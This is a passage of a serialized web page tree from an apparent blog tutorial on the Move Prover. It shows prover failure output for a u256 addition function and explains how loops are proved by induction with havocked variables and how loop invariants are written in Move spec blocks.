spec",{"type":25,"tag":216,"props":14359,"children":14360},{"style":8205},[14361],{"type":31,"value":13537},{"type":25,"tag":216,"props":14363,"children":14364},{"style":8205},[14365],{"type":31,"value":7241},{"type":25,"tag":216,"props":14367,"children":14368},{"class":6922,"line":7110},[14369,14374,14379,14383,14387,14391,14395,14399,14403,14407,14411,14415,14419,14423,14427,14431,14435,14439,14443,14447,14451],{"type":25,"tag":216,"props":14370,"children":14371},{"style":6953},[14372],{"type":31,"value":14373},"|",{"type":25,"tag":216,"props":14375,"children":14376},{"style":7047},[14377],{"type":31,"value":14378},"         aborts_if",{"type":25,"tag":216,"props":14380,"children":14381},{"style":8205},[14382],{"type":31,"value":13660},{"type":25,"tag":216,"props":14384,"children":14385},{"style":6964},[14386],{"type":31,"value":1850},{"type":25,"tag":216,"props":14388,"children":14389},{"style":7047},[14390],{"type":31,"value":162},{"type":25,"tag":216,"props":14392,"children":14393},{"style":6964},[14394],{"type":31,"value":7036},{"type":25,"tag":216,"props":14396,"children":14397},{"style":8205},[14398],{"type":31,"value":3539},{"type":25,"tag":216,"props":14400,"children":14401},{"style":8205},[14402],{"type":31,"value":13660},{"type":25,"tag":216,"props":14404,"children":14405},{"style":6964},[14406],{"type":31,"value":1850},{"type":25,"tag":216,"props":14408,"children":14409},{"style":7047},[14410],{"type":31,"value":7171},{"type":25,"tag":216,"props":14412,"children":14413},{"style":6964},[14414],{"type":31,"value":7036},{"type":25,"tag":216,"props":14416,"children":14417},{"style":6953},[14418],{"type":31,"value":5902},{"type":25,"tag":216,"props":14420,"children":14421},{"style":8205},[14422],{"type":31,"value":266},{"type":25,"tag":216,"props":14424,"children":14425},{"style":8205},[14426],{"type":31,"value":13616},{"type":25,"tag":216,"props":14428,"children":14429},{"style":6936},[14430],{"type":31,"value":13773},{"type":25,"tag":216,"props":14432,"children":14433},{"style":8205},[14434],{"type":31,"value":13616},{"type":25,"tag":216,"props":14436,"children":14437},{"style":6936},[14438],{"type":31,"value":13773},{"type":25,"tag":216,"props":14440,"children":14441},{"style":8205},[14442],{"type":31,"value":13616},{"type":25,"tag":216,"props":14444,"children":14445},{"style":6936},[14446],{"type":31,"value":13773},{"type":25,"tag":216,"props":14448,"children":14449},{"style":8205},[14450],{"type":31,"value":13616},{"type":25,"tag":216,"props":14452,"children":14453},{"style":6964},[14454],{"type":31,"value":6967},{"type":25,"tag":216,"props":14456,"children":14457},{"class":6922,"line":7216},[14458,14462,14467,14471,14475,14479,14483,14487,14491,14495,14499,14503,14507,14511,14515,14519],{"type":25,"tag":216,"props":14459,"children":14460},{"style":6953},[14461],{"type":31,"value":14373},{"type":25,"tag":216,"props":14463,"children":14464},{"style":7047},[14465],{"type":31,"value":14466},"         ensures",{"type":25,"tag":216,"props":14468,"children":14469},{"style":8205},[14470],{"type":31,"value":13660},{"type":25,"tag":216,"props":14472,"children":14473},{"style":6964},[14474],{"type":31,"value":1850},{"type":25,"tag":216,"props":14476,"children":14477},{"style":7047},[14478],{"type":31,"value":13037},{"type":25,"tag":216,"props":14480,"children":14481},{"style":6964},[14482],{"type":31,"value":7036},{"type":25,"tag":216,"props":14484,"children":14485},{"style":8205},[14486],{"type":31,"value":12528},{"type":25,"tag":216,"props":14488,"children":14489},{"style":8205},[14490],{"type":31,"value":13660},{"type":25,"tag":216,"props":14492,"children":14493},{"style":6964},[14494],{"type":31,"value":1850},{"type":25,"tag":216,"props":14496,"children":14497},{"style":7047},[14498],{"type":31,"value":162},{"type":25,"tag":216,"props":14500,"children":14501},{"style":6964},[14502],{"type":31,"value":7036},{"type":25,"tag":216,"props":14504,"children":14505},{"style":8205},[14506],{"type":31,"value":3539},{"type":25,"tag":216,"props":14508,"children":14509},{"style":8205},[14510],{"type":31,"value":13660},{"type":25,"tag":216,"props":14512,"children":14513},{"style":6964},[14514],{"type":31,"value":1850},{"type":25,"tag":216,"props":14516,"children":14517},{"style":7047},[14518],{"type":31,"value":7171},{"type":25,"tag":216,"props":14520,"children":14521},{"style":6964},[14522],{"type":31,"value":7797},{"type":25,"tag":216,"props":14524,"children":14525},{"class":6922,"line":7244},[14526,14530],{"type":25,"tag":216,"props":14527,"children":14528},{"style":6953},[14529],{"type":31,"value":14373},{"type":25,"tag":216,"props":14531,"children":14532},{"style":6964},[14533],{"type":31,"value":14534},"     }\n",{"type":25,"tag":216,"props":14536,"children":14537},{"class":6922,"line":7257},[14538],{"type":25,"tag":216,"props":14539,"children":14540},{"style":7047},[14541],{"type":31,"value":14542},"╰─────^\n",{"type":25,"tag":216,"props":14544,"children":14545},{"class":6922,"line":7275},[14546],{"type":25,"tag":216,"props":14547,"children":14548},{"emptyLinePlaceholder":16},[14549],{"type":31,"value":7642},{"type":25,"tag":216,"props":14551,"children":14552},{"class":6922,"line":7296},[14553],{"type":25,"tag":216,"props":14554,"children":14555},{"style":6964},[14556],{"type":31,"value":14275},{"type":25,"tag":216,"props":14558,"children":14559},{"class":6922,"line":7305},[14560],{"type":25,"tag":216,"props":14561,"children":14562},{"emptyLinePlaceholder":16},[14563],{"type":31,"value":7642},{"type":25,"tag":216,"props":14565,"children":14566},{"class":6922,"line":7557},[14567,14572,14577],{"type":25,"tag":216,"props":14568,"children":14569},{"style":7047},[14570],{"type":31,"value":14571}," at",{"type":25,"tag":216,"props":14573,"children":14574},{"style":8205},[14575],{"type":31,"value":14576}," ./sources/u256.move:316:",{"type":25,"tag":216,"props":14578,"children":14579},{"style":8205},[14580],{"type":31,"value":14581}," add\n",{"type":25,"tag":216,"props":14583,"children":14584},{"class":6922,"line":7574},[14585,14590,14595,14600,14604,14608,14612,14617,14622,14627,14632,14637],{"type":25,"tag":216,"props":14586,"children":14587},{"style":7047},[14588],{"type":31,"value":14589}," enter",{"type":25,"tag":216,"props":14591,"children":14592},{"style":8205},[14593],{"type":31,"value":14594}," loop,",{"type":25,"tag":216,"props":14596,"children":14597},{"style":8205},[14598],{"type":31,"value":14599}," variable",{"type":25,"tag":216,"props":14601,"children":14602},{"style":6964},[14603],{"type":31,"value":1850},{"type":25,"tag":216,"props":14605,"children":14606},{"style":7047},[14607],{"type":31,"value":3245},{"type":25,"tag":216,"props":14609,"children":14610},{"style":6964},[14611],{"type":31,"value":7036},{"type":25,"tag":216,"props":14613,"children":14614},{"style":8205},[14615],{"type":31,"value":14616},"carry,",{"type":25,"tag":216,"props":14618,"children":14619},{"style":8205},[14620],{"type":31,"value":14621}," i,",{"type":25,"tag":216,"props":14623,"children":14624},{"style":8205},[14625],{"type":31,"value":14626}," ret",{"type":25,"tag":216,"props":14628,"children":14629},{"style":8205},[14630],{"type":31,"value":14631}," havocked",{"type":25,"tag":216,"props":14633,"children":14634},{"style":8205},[14635],{"type":31,"value":14636}," and",{"type":25,"tag":216,"props":14638,"children":14639},{"style":8205},[14640],{"type":31,"value":14641}," reassigned\n",{"type":25,"tag":216,"props":14643,"children":14644},{"class":6922,"line":7591},[14645,14650,14654],{"type":25,"tag":216,"props":14646,"children":14647},{"style":7047},[14648],{"type":31,"value":14649},"     carry",{"type":25,"tag":216,"props":14651,"children":14652},{"style":8205},[14653],{"type":31,"value":6956},{"type":25,"tag":216,"props":14655,"children":14656},{"style":6989},[14657],{"type":31,"value":14658}," 54\n",{"type":25,"tag":216,"props":14660,"children":14661},{"class":6922,"line":7604},[14662,14667,14671],{"type":25,"tag":216,"props":14663,"children":14664},{"style":7047},[14665],{"type":31,"value":14666},"     i",{"type":25,"tag":216,"props":14668,"children":14669},{"style":8205},[14670],{"type":31,"value":6956},{"type":25,"tag":216,"props":14672,"children":14673},{"style":6989},[14674],{"type":31,"value":14675}," 3792\n",{"type":25,"tag":216,"props":14677,"children":14678},{"class":6922,"line":7613},[14679,14684,14688,14693,14697,14702,14707,14711,14716,14721,14725,14730,14735,14739,14744],{"type":25,"tag":216,"props":14680,"children":14681},{"style":7047},[14682],{"type":31,"value":14683},"     ret",{"type":25,"tag":216,"props":14685,"children":14686},{"style":8205},[14687],{"type":31,"value":6956},{"type":25,"tag":216,"props":14689,"children":14690},{"style":8205},[14691],{"type":31,"value":14692}," u256.U256{v0",{"type":25,"tag":216,"props":14694,"children":14695},{"style":8205},[14696],{"type":31,"value":6956},{"type":25,"tag":216,"props":14698,"children":14699},{"style":8205},[14700],{"type":31,"value":14701}," 26418,",{"type":25,"tag":216,"props":14703,"children":14704},{"style":8205},[14705],{"type":31,"value":14706}," v1",{"type":25,"tag":216,"props":14708,"children":14709},{"style":8205},[14710],{"type":31,"value":6956},{"type":25,"tag":216,"props":14712,"children":14713},{"style":8205},[14714],{"type":31,"value":14715}," 27938,",{"type":25,"tag":216,"props":14717,"children":14718},{"style":8205},[14719],{"type":31,"value":14720}," v2",{"type":25,"tag":216,"props":14722,"children":14723},{"style":8205},[14724],{"type":31,"value":6956},{"type":25,"tag":216,"props":14726,"children":14727},{"style":8205},[14728],{"type":31,"value":14729}," 6900,",{"type":25,"tag":216,"props":14731,"children":14732},{"style":8205},[14733],{"type":31,"value":14734}," v3",{"type":25,"tag":216,"props":14736,"children":14737},{"style":8205},[14738],{"type":31,"value":6956},{"type":25,"tag":216,"props":14740,"children":14741},{"style":6989},[14742],{"type":31,"value":14743}," 1999",{"type":25,"tag":216,"props":14745,"children":14746},{"style":8205},[14747],{"type":31,"value":7874},{"type":25,"tag":216,"props":14749,"children":14750},{"class":6922,"line":7636},[14751,14755,14760],{"type":25,"tag":216,"props":14752,"children":14753},{"style":7047},[14754],{"type":31,"value":14571},{"type":25,"tag":216,"props":14756,"children":14757},{"style":8205},[14758],{"type":31,"value":14759}," ./sources/u256.move:346:",{"type":25,"tag":216,"props":14761,"children":14762},{"style":8205},[14763],{"type":31,"value":14581},{"type":25,"tag":216,"props":14765,"children":14766},{"class":6922,"line":7645},[14767],{"type":25,"tag":216,"props":14768,"children":14769},{"style":7047},[14770],{"type":31,"value":14771},"     ABORTED\n",{"type":25,"tag":216,"props":14773,"children":14774},{"class":6922,"line":7654},[14775],{"type":25,"tag":216,"props":14776,"children":14777},{"emptyLinePlaceholder":16},[14778],{"type":31,"value":7642},{"type":25,"tag":216,"props":14780,"children":14781},{"class":6922,"line":7722},[14782,14787,14792,14796,14801,14806,14811,14815,14820,14824],{"type":25,"tag":216,"props":14783,"children":14784},{"style":7047},[14785],{"type":31,"value":14786},"FAILURE",{"type":25,"tag":216,"props":14788,"children":14789},{"style":8205},[14790],{"type":31,"value":14791}," proving",{"type":25,"tag":216,"props":14793,"children":14794},{"style":6989},[14795],{"type":31,"value":8471},{"type":25,"tag":216,"props":14797,"children":14798},{"style":8205},[14799],{"type":31,"value":14800}," modules",{"type":25,"tag":216,"props":14802,"children":14803},{"style":8205},[14804],{"type":31,"value":14805}," from",{"type":25,"tag":216,"props":14807,"children":14808},{"style":8205},[14809],{"type":31,"value":14810}," package",{"type":25,"tag":216,"props":14812,"children":14813},{"style":8205},[14814],{"type":31,"value":14330},{"type":25,"tag":216,"props":14816,"children":14817},{"style":7047},[14818],{"type":31,"value":14819},"u256",{"type":25,"tag":216,"props":14821,"children":14822},{"style":8205},[14823],{"type":31,"value":14339},{"type":25,"tag":216,"props":14825,"children":14826},{"style":6964},[14827],{"type":31,"value":14828}," in 9.143s\n",{"type":25,"tag":216,"props":14830,"children":14831},{"class":6922,"line":7730},[14832],{"type":25,"tag":216,"props":14833,"children":14834},{"style":6964},[14835],{"type":31,"value":14836},"{\n",{"type":25,"tag":216,"props":14838,"children":14839},{"class":6922,"line":7760},[14840,14845,14849],{"type":25,"tag":216,"props":14841,"children":14842},{"style":7047},[14843],{"type":31,"value":14844},"    \"Error\"",{"type":25,"tag":216,"props":14846,"children":14847},{"style":7047},[14848],{"type":31,"value":1472},{"type":25,"tag":216,"props":14850,"children":14851},{"style":8205},[14852],{"type":31,"value":14853}," \"Move Prover failed: exiting with verification errors\"\n",{"type":25,"tag":216,"props":14855,"children":14856},{"class":6922,"line":7768},[14857],{"type":25,"tag":216,"props":14858,"children":14859},{"style":6964},[14860],{"type":31,"value":7874},{"type":25,"tag":38,"props":14862,"children":14863},{},[14864,14866,14871],{"type":31,"value":14865},"The prover is telling us that proving failed because the abort was not covered by our ",{"type":25,"tag":82,"props":14867,"children":14869},{"className":14868},[],[14870],{"type":31,"value":12277},{"type":31,"value":14872}," clauses. But there is no other abort situation that we have to cover, right?",{"type":25,"tag":38,"props":14874,"children":14875},{},[14876,14878,14884],{"type":31,"value":14877},"If we keep reading the error output, we will encounter the somewhat cryptic message: ",{"type":25,"tag":82,"props":14879,"children":14881},{"className":14880},[],[14882],{"type":31,"value":14883},"ret havocked and reassigned",{"type":31,"value":179},{"type":25,"tag":38,"props":14886,"children":14887},{},[14888],{"type":31,"value":14889},"What does this mean?",{"type":25,"tag":38,"props":14891,"children":14892},{},[14893,14895,14902],{"type":31,"value":14894},"By diving into the Move Prover source, we find a ",{"type":25,"tag":162,"props":14896,"children":14899},{"href":14897,"rel":14898},"https://github.com/move-language/move/blob/e0dafc5cf3efe4c4e61411f10cdf0f379a36673c/language/move-prover/bytecode/src/loop_analysis.rs#L94",[166],[14900],{"type":31,"value":14901},"likely suspect",{"type":31,"value":14903},". The prover attempts to prove all loops with induction!",{"type":25,"tag":38,"props":14905,"children":14906},{},[14907],{"type":31,"value":14908},"More formally, it will translate the loop into two key steps, following the classic steps of a proof by induction",{"type":25,"tag":6711,"props":14910,"children":14911},{},[14912,14917],{"type":25,"tag":2043,"props":14913,"children":14914},{},[14915],{"type":31,"value":14916},"Base Case: Asserting the loop invariant holds at the start of loop execution",{"type":25,"tag":2043,"props":14918,"children":14919},{},[14920],{"type":31,"value":14921},"Inductive Step: Assume the invariant, execute the loop body, and assert that the invariant still holds",{"type":25,"tag":38,"props":14923,"children":14924},{},[14925,14927,14932,14934,14940,14941,14947,14948,14953,14955,14960],{"type":31,"value":14926},"The loop prover will also ",{"type":25,"tag":9273,"props":14928,"children":14929},{},[14930],{"type":31,"value":14931},"havoc, or assign random values to, all variables written to inside the loop",{"type":31,"value":14933},". Going back to the log message, this implies that the variables ",{"type":25,"tag":82,"props":14935,"children":14937},{"className":14936},[],[14938],{"type":31,"value":14939},"carry",{"type":31,"value":7026},{"type":25,"tag":82,"props":14942,"children":14944},{"className":14943},[],[14945],{"type":31,"value":14946},"ret",{"type":31,"value":1307},{"type":25,"tag":82,"props":14949,"children":14951},{"className":14950},[],[14952],{"type":31,"value":2289},{"type":31,"value":14954}," have been havocked, or assigned random values. This also explains why the input and output of ",{"type":25,"tag":82,"props":14956,"children":14958},{"className":14957},[],[14959],{"type":31,"value":13594},{"type":31,"value":14961}," makes no sense.",{"type":25,"tag":38,"props":14963,"children":14964},{},[14965],{"type":31,"value":14966},"More concretely, the loop analysis translates into the following steps.",{"type":25,"tag":6711,"props":14968,"children":14969},{},[14970,14975,14980,14985,14990,14995],{"type":25,"tag":2043,"props":14971,"children":14972},{},[14973],{"type":31,"value":14974},"Assert the loop invariant",{"type":25,"tag":2043,"props":14976,"children":14977},{},[14978],{"type":31,"value":14979},"Havoc all modified variables",{"type":25,"tag":2043,"props":14981,"children":14982},{},[14983],{"type":31,"value":14984},"Assume the loop invariant",{"type":25,"tag":2043,"props":14986,"children":14987},{},[14988],{"type":31,"value":14989},"Assume the loop guard (the code inside the while condition)",{"type":25,"tag":2043,"props":14991,"children":14992},{},[14993],{"type":31,"value":14994},"Run the loop body",{"type":25,"tag":2043,"props":14996,"children":14997},{},[14998],{"type":31,"value":14974},{"type":25,"tag":38,"props":15000,"children":15001},{},[15002],{"type":31,"value":15003},"There are two approaches to dealing with loops.",{"type":25,"tag":38,"props":15005,"children":15006},{},[15007],{"type":31,"value":15008},"The first would be to specify a loop invariant.",{"type":25,"tag":38,"props":15010,"children":15011},{},[15012,15014,15021],{"type":31,"value":15013},"In order to specify the loop invariant, we need to use some special syntax, as we explored briefly in our ",{"type":25,"tag":162,"props":15015,"children":15018},{"href":15016,"rel":15017},"https://osec.io/blog/tutorials/2022-09-06-move-introduction/",[166],[15019],{"type":31,"value":15020},"previous post",{"type":31,"value":179},{"type":25,"tag":206,"props":15023,"children":15025},{"code":15024,"language":6914,"meta":7,"className":6915,"style":7},"  while ({\n      spec {\n          invariant len(amounts_times_coins) == i;\n          invariant i \u003C= n_coins;\n          invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n      };\n      (i \u003C n_coins)\n  }) {\n      vector::push_back(\n          &mut amounts_times_coins,\n          (*vector::borrow(&input, (i as u64)) as u128) * (n_coins as u128)\n      );\n      i = i + 1;\n  };\n",[15026],{"type":25,"tag":82,"props":15027,"children":15028},{"__ignoreMap":7},[15029,15041,15052,15088,15111,15194,15201,15225,15233,15253,15273,15364,15371,15399],{"type":25,"tag":216,"props":15030,"children":15031},{"class":6922,"line":6923},[15032,15037],{"type":25,"tag":216,"props":15033,"children":15034},{"style":6973},[15035],{"type":31,"value":15036},"  while",{"type":25,"tag":216,"props":15038,"children":15039},{"style":6964},[15040],{"type":31,"value":12485},{"type":25,"tag":216,"props":15042,"children":15043},{"class":6922,"line":6769},[15044,15048],{"type":25,"tag":216,"props":15045,"children":15046},{"style":6947},[15047],{"type":31,"value":12882},{"type":25,"tag":216,"props":15049,"children":15050},{"style":6964},[15051],{"type":31,"value":7241},{"type":25,"tag":216,"props":15053,"children":15054},{"class":6922,"line":6778},[15055,15060,15064,15068,15072,15076,15080,15084],{"type":25,"tag":216,"props":15056,"children":15057},{"style":6947},[15058],{"type":31,"value":15059},"          invariant",{"type":25,"tag":216,"props":15061,"children":15062},{"style":7047},[15063],{"type":31,"value":12510},{"type":25,"tag":216,"props":15065,"children":15066},{"style":6964},[15067],{"type":31,"value":1850},{"type":25,"tag":216,"props":15069,"children":15070},{"style":6947},[15071],{"type":31,"value":12519},{"type":25,"tag":216,"props":15073,"children":15074},{"style":6964},[15075],{"type":31,"value":7036},{"type":25,"tag":216,"props":15077,"children":15078},{"style":6953},[15079],{"type":31,"value":12528},{"type":25,"tag":216,"props":15081,"children":15082},{"style":6947},[15083],{"type":31,"value":7354},{"type":25,"tag":216,"props":15085,"children":15086},{"style":6964},[15087],{"type":31,"value":6967},{"type":25,"tag":216,"props":15089,"children":15090},{"class":6922,"line":7005},[15091,15095,15099,15103,15107],{"type":25,"tag":216,"props":15092,"children":15093},{"style":6947},[15094],{"type":31,"value":15059},{"type":25,"tag":216,"props":15096,"children":15097},{"style":6947},[15098],{"type":31,"value":7354},{"type":25,"tag":216,"props":15100,"children":15101},{"style":6953},[15102],{"type":31,"value":12149},{"type":25,"tag":216,"props":15104,"children":15105},{"style":6947},[15106],{"type":31,"value":12439},{"type":25,"tag":216,"props":15108,"children":15109},{"style":6964},[15110],{"type":31,"value":6967},{"type":25,"tag":216,"props":15112,"children":15113},{"class":6922,"line":7110},[15114,15118,15122,15126,15130,15134,15138,15142,15146,15150,15154,15158,15162,15166,15170,15174,15178,15182,15186,15190],{"type":25,"tag":216,"props":15115,"children":15116},{"style":6947},[15117],{"type":31,"value":15059},{"type":25,"tag":216,"props":15119,"children":15120},{"style":6947},[15121],{"type":31,"value":12571},{"type":25,"tag":216,"props":15123,"children":15124},{"style":6947},[15125],{"type":31,"value":12576},{"type":25,"tag":216,"props":15127,"children":15128},{"style":6936},[15129],{"type":31,"value":6986},{"type":25,"tag":216,"props":15131,"children":15132},{"style":6989},[15133],{"type":31,"value":6992},{"type":25,"tag":216,"props":15135,"children":15136},{"style":6953},[15137],{"type":31,"value":6997},{"type":25,"tag":216,"props":15139,"children":15140},{"style":6947},[15141],{"type":31,"value":2289},{"type":25,"tag":216,"props":15143,"children":15144},{"style":6953},[15145],{"type":31,"value":1472},{"type":25,"tag":216,"props":15147,"children":15148},{"style":6947},[15149],{"type":31,"value":12374},{"type":25,"tag":216,"props":15151,"children":15152},{"style":6964},[15153],{"type":31,"value":7701},{"type":25,"tag":216,"props":15155,"children":15156},{"style":6947},[15157],{"type":31,"value":12609},{"type":25,"tag":216,"props":15159,"children":15160},{"style":6964},[15161],{"type":31,"value":12614},{"type":25,"tag":216,"props":15163,"children":15164},{"style":6953},[15165],{"type":31,"value":12528},{"type":25,"tag":216,"props":15167,"children":15168},{"style":6947},[15169],{"type":31,"value":12623},{"type":25,"tag":216,"props":15171,"children":15172},{"style":6964},[15173],{"type":31,"value":7701},{"type":25,"tag":216,"props":15175,"children":15176},{"style":6947},[15177],{"type":31,"value":12609},{"type":25,"tag":216,"props":15179,"children":15180},{"style":6964},[15181],{"type":31,"value":12614},{"type":25,"tag":216,"props":15183,"children":15184},{"style":6953},[15185],{"type":31,"value":8519},{"type":25,"tag":216,"props":15187,"children":15188},{"style":6947},[15189],{"type":31,"value":12439},{"type":25,"tag":216,"props":15191,"children":15192},{"style":6964},[15193],{"type":31,"value":6967},{"type":25,"tag":216,"props":15195,"children":15196},{"class":6922,"line":7216},[15197],{"type":25,"tag":216,"props":15198,"children":15199},{"style":6964},[15200],{"type":31,"value":12874},{"type":25,"tag":216,"props":15202,"children":15203},{"class":6922,"line":7244},[15204,15209,15213,15217,15221],{"type":25,"tag":216,"props":15205,"children":15206},{"style":6964},[15207],{"type":31,"value":15208},"      (",{"type":25,"tag":216,"props":15210,"children":15211},{"style":6947},[15212],{"type":31,"value":2289},{"type":25,"tag":216,"props":15214,"children":15215},{"style":6953},[15216],{"type":31,"value":12672},{"type":25,"tag":216,"props":15218,"children":15219},{"style":6947},[15220],{"type":31,"value":12439},{"type":25,"tag":216,"props":15222,"children":15223},{"style":6964},[15224],{"type":31,"value":7107},{"type":25,"tag":216,"props":15226,"children":15227},{"class":6922,"line":7257},[15228],{"type":25,"tag":216,"props":15229,"children":15230},{"style":6964},[15231],{"type":31,"value":15232},"  }) {\n",{"type":25,"tag":216,"props":15234,"children":15235},{"class":6922,"line":7275},[15236,15241,15245,15249],{"type":25,"tag":216,"props":15237,"children":15238},{"style":6964},[15239],{"type":31,"value":15240},"      vector",{"type":25,"tag":216,"props":15242,"children":15243},{"style":6953},[15244],{"type":31,"value":7438},{"type":25,"tag":216,"props":15246,"children":15247},{"style":7047},[15248],{"type":31,"value":12705},{"type":25,"tag":216,"props":15250,"children":15251},{"style":6964},[15252],{"type":31,"value":7420},{"type":25,"tag":216,"props":15254,"children":15255},{"class":6922,"line":7296},[15256,15261,15265,15269],{"type":25,"tag":216,"props":15257,"children":15258},{"style":6953},[15259],{"type":31,"value":15260},"          &",{"type":25,"tag":216,"props":15262,"children":15263},{"style":6936},[15264],{"type":31,"value":7691},{"type":25,"tag":216,"props":15266,"children":15267},{"style":6947},[15268],{"type":31,"value":12374},{"type":25,"tag":216,"props":15270,"children":15271},{"style":6964},[15272],{"type":31,"value":7465},{"type":25,"tag":216,"props":15274,"children":15275},{"class":6922,"line":7305},[15276,15280,15284,15288,15292,15296,15300,15304,15308,15312,15316,15320,15324,15328,15332,15336,15340,15344,15348,15352,15356,15360],{"type":25,"tag":216,"props":15277,"children":15278},{"style":6964},[15279],{"type":31,"value":12663},{"type":25,"tag":216,"props":15281,"children":15282},{"style":6953},[15283],{"type":31,"value":8519},{"type":25,"tag":216,"props":15285,"children":15286},{"style":6964},[15287],{"type":31,"value":12746},{"type":25,"tag":216,"props":15289,"children":15290},{"style":6953},[15291],{"type":31,"value":7438},{"type":25,"tag":216,"props":15293,"children":15294},{"style":7047},[15295],{"type":31,"value":12755},{"type":25,"tag":216,"props":15297,"children":15298},{"style":6964},[15299],{"type":31,"value":1850},{"type":25,"tag":216,"props":15301,"children":15302},{"style":6953},[15303],{"type":31,"value":7059},{"type":25,"tag":216,"props":15305,"children":15306},{"style":6947},[15307],{"type":31,"value":12319},{"type":25,"tag":216,"props":15309,"children":15310},{"style":6964},[15311],{"type":31,"value":12772},{"type":25,"tag":216,"props":15313,"children":15314},{"style":6947},[15315],{"type":31,"value":2289},{"type":25,"tag":216,"props":15317,"children":15318},{"style":6936},[15319],{"type":31,"value":12781},{"type":25,"tag":216,"props":15321,"children":15322},{"style":7375},[15323],{"type":31,"value":9811},{"type":25,"tag":216,"props":15325,"children":15326},{"style":6964},[15327],{"type":31,"value":12790},{"type":25,"tag":216,"props":15329,"children":15330},{"style":6936},[15331],{"type":31,"value":12795},{"type":25,"tag":216,"props":15333,"children":15334},{"style":7375},[15335],{"type":31,"value":12800},{"type":25,"tag":216,"props":15337,"children":15338},{"style":6964},[15339],{"type":31,"value":7036},{"type":25,"tag":216,"props":15341,"children":15342},{"style":6953},[15343],{"type":31,"value":8519},{"type":25,"tag":216,"props":15345,"children":15346},{"style":6964},[15347],{"type":31,"value":7016},{"type":25,"tag":216,"props":15349,"children":15350},{"style":6947},[15351],{"type":31,"value":12817},{"type":25,"tag":216,"props":15353,"children":15354},{"style":6936},[15355],{"type":31,"value":12781},{"type":25,"tag":216,"props":15357,"children":15358},{"style":7375},[15359],{"type":31,"value":12800},{"type":25,"tag":216,"props":15361,"children":15362},{"style":6964},[15363],{"type":31,"value":7107},{"type":25,"tag":216,"props":15365,"children":15366},{"class":6922,"line":7557},[15367],{"type":25,"tag":216,"props":15368,"children":15369},{"style":6964},[15370],{"type":31,"value":10718},{"type":25,"tag":216,"props":15372,"children":15373},{"class":6922,"line":7574},[15374,15379,15383,15387,15391,15395],{"type":25,"tag":216,"props":15375,"children":15376},{"style":6947},[15377],{"type":31,"value":15378},"      i",{"type":25,"tag":216,"props":15380,"children":15381},{"style":6953},[15382],{"type":31,"value":6956},{"type":25,"tag":216,"props":15384,"children":15385},{"style":6947},[15386],{"type":31,"value":7354},{"type":25,"tag":216,"props":15388,"children":15389},{"style":6953},[15390],{"type":31,"value":12858},{"type":25,"tag":216,"props":15392,"children":15393},{"style":6989},[15394],{"type":31,"value":8471},{"type":25,"tag":216,"props":15396,"children":15397},{"style":6964},[15398],{"type":31,"value":6967},{"type":25,"tag":216,"props":15400,"children":15401},{"class":6922,"line":7591},[15402],{"type":25,"tag":216,"props":15403,"children":15404},{"style":6964},[15405],{"type":31,"value":15406},"  };\n",{"type":25,"tag":38,"props":15408,"children":15409},{},[15410,15412,15418,15420,15425,15427,15433],{"type":31,"value":15411},"In this case, the brackets specify the loop invariant for the ",{"type":25,"tag":82,"props":15413,"children":15415},{"className":15414},[],[15416],{"type":31,"value":15417},"while",{"type":31,"value":15419}," loop. Note that because the loop invariant executes ",{"type":25,"tag":64,"props":15421,"children":15422},{},[15423],{"type":31,"value":15424},"after",{"type":31,"value":15426}," the loop guard, so we need to account for an extra step with ",{"type":25,"tag":82,"props":15428,"children":15430},{"className":15429},[],[15431],{"type":31,"value":15432},"i \u003C= n_coins",{"type":31,"value":179},{"type":25,"tag":206,"props":15435,"children":15437},{"code":15436,"language":6914,"meta":7,"className":6915,"style":7},"  while ({\n      spec {\n          invariant len(amounts_times_coins) == i;\n          invariant i \u003C= n_coins;\n          invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n      };\n      (i \u003C n_coins)\n  }) {\n",[15438],{"type":25,"tag":82,"props":15439,"children":15440},{"__ignoreMap":7},[15441,15452,15463,15498,15521,15604,15611,15634],{"type":25,"tag":216,"props":15442,"children":15443},{"class":6922,"line":6923},[15444,15448],{"type":25,"tag":216,"props":15445,"children":15446},{"style":6973},[15447],{"type":31,"value":15036},{"type":25,"tag":216,"props":15449,"children":15450},{"style":6964},[15451],{"type":31,"value":12485},{"type":25,"tag":216,"props":15453,"children":15454},{"class":6922,"line":6769},[15455,15459],{"type":25,"tag":216,"props":15456,"children":15457},{"style":6947},[15458],{"type":31,"value":12882},{"type":25,"tag":216,"props":15460,"children":15461},{"style":6964},[15462],{"type":31,"value":7241},{"type":25,"tag":216,"props":15464,"children":15465},{"class":6922,"line":6778},[15466,15470,15474,15478,15482,15486,15490,15494],{"type":25,"tag":216,"props":15467,"children":15468},{"style":6947},[15469],{"type":31,"value":15059},{"type":25,"tag":216,"props":15471,"children":15472},{"style":7047},[15473],{"type":31,"value":12510},{"type":25,"tag":216,"props":15475,"children":15476},{"style":6964},[15477],{"type":31,"value":1850},{"type":25,"tag":216,"props":15479,"children":15480},{"style":6947},[15481],{"type":31,"value":12519},{"type":25,"tag":216,"props":15483,"children":15484},{"style":6964},[15485],{"type":31,"value":7036},{"type":25,"tag":216,"props":15487,"children":15488},{"style":6953},[15489],{"type":31,"value":12528},{"type":25,"tag":216,"props":15491,"children":15492},{"style":6947},[15493],{"type":31,"value":7354},{"type":25,"tag":216,"props":15495,"children":15496},{"style":6964},[15497],{"type":31,"value":6967},{"type":25,"tag":216,"props":15499,"children":15500},{"class":6922,"line":7005},[15501,15505,15509,15513,15517],{"type":25,"tag":216,"props":15502,"children":15503},{"style":6947},[15504],{"type":31,"value":15059},{"type":25,"tag":216,"props":15506,"children":15507},{"style":6947},[15508],{"type":31,"value":7354},{"type":25,"tag":216,"props":15510,"children":15511},{"style":6953},[15512],{"type":31,"value":12149},{"type":25,"tag":216,"props":15514,"children":15515},{"style":6947},[15516],{"type":31,"value":12439},{"type":25,"tag":216,"props":15518,"children":15519},{"style":6964},[15520],{"type":31,"value":6967},{"type":25,"tag":216,"props":15522,"children":15523},{"class":6922,"line":7110},[15524,15528,15532,15536,15540,15544,15548,15552,15556,15560,15564,15568,15572,15576,15580,15584,15588,15592,15596,15600],{"type":25,"tag":216,"props":15525,"children":15526},{"style":6947},[15527],{"type":31,"value":15059},{"type":25,"tag":216,"props":15529,"children":15530},{"style":6947},[15531],{"type":31,"value":12571},{"type":25,"tag":216,"props":15533,"children":15534},{"style":6947},[15535],{"type":31,"value":12576},{"type":25,"tag":216,"props":15537,"children":15538},{"style":6936},[15539],{"type":31,"value":6986},{"type":25,"tag":216,"props":15541,"children":15542},{"style":6989},[15543],{"type":31,"value":6992},{"type":25,"tag":216,"props":15545,"children":15546}